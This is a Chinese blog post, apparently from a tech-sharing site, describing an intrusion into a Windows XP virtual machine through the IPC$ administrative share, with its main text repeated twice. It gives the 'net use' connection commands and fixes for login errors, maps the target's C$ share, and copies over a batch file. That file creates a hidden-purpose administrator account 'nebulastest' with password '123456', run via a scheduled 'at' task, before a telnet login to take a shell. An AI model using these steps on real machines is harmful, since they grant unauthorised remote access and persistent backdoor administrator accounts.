利用IPC$共享入侵windowsXP实践
2014-06-09 19:36
211 查看
测试环境:主机(windows XP sp3)与windows XP sp2虚拟机)
通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:
出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙)
出现1326错误:
1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。
2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。
紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
![](https://img-blog.csdn.net/20140609193438265?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
映射对方默认共享c盘:net use z: \\目标IP\c$
![](https://img-blog.csdn.net/20140609193449656?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
在我的电脑中会出现网络驱动器
![](https://img-blog.csdn.net/20140609193459062?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del
在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat)
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限
然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat
![](https://img-blog.csdn.net/20140609193509765?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"
![](https://img-blog.csdn.net/20140609193520343?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
(前提:目标电脑已经开启telnet服务)
双击“telnet服务”-----选择“自动”-----点击“启动”
![](https://img-blog.csdn.net/20140609193529078?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
在命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码)
输入密码不会现在但是回车后会自动验证是否密码正确
![](https://img-blog.csdn.net/20140609193540484?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
下图已经输入密码但是不会显示:
![](https://img-blog.csdn.net/20140609193550609?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
登陆后的界面:
![](https://img-blog.csdn.net/20140609193601750?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcmF5X3Jhbmc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
大功告成,获得目标主机shell
通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:
出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙)
出现1326错误:
1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。
2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。
紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
映射对方默认共享c盘:net use z: \\目标IP\c$
在我的电脑中会出现网络驱动器
建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del
在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat)
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限
然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat
删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"
(前提:目标电脑已经开启telnet服务)
双击“telnet服务”-----选择“自动”-----点击“启动”
在命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码)
输入密码不会现在但是回车后会自动验证是否密码正确
下图已经输入密码但是不会显示:
登陆后的界面:
大功告成,获得目标主机shell
相关文章推荐
- 如何防止利用ipc$及默认共享的入侵
- 如何防止利用ipc$及默认共享的入侵
- 怎样防止别人利用 ipc$和默认共享入侵
- 怎样利用ipc$和默认共享入侵远程电脑
- 怎样防止别人利用 ipc$和默认共享入侵
- [转]如何防止利用ipc$及默认共享的入侵 [http://security.ctocio.com.cn/tips/380/7607380.shtml]
- 利用IPC$共享入侵windowsXP实战
- 防止别人用ipc$和默认共享入侵
- 防止别人用ipc$和默认共享入侵
- 利用IPC$空连接进行入侵及防范的方法
- 如何利用终端服务入侵远程计算机
- 谨防"代理木马"利用网络共享传播
- 利用共享内存实现进程间通信
- 利用content内容共享接口来减少python应用的大小
- ubuntu16.04利用samba共享文件夹
- IPC$局域网入侵详解
- 入侵网站的各种漏洞的利用和搜索参数
- 在应用间利用KeyChain共享数据
- 利用硬件信息实现共享软件的安全注册
- 利用Event和MapFile进程共享信息